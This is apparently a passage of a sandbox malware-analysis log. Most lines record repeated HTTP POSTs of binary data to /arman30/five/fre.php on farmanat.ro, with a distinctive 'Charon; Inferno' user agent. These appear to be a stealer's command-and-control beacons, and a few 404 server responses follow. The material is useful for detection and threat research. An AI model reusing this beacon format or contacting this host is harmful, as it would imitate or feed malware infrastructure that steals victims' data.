        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:47:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
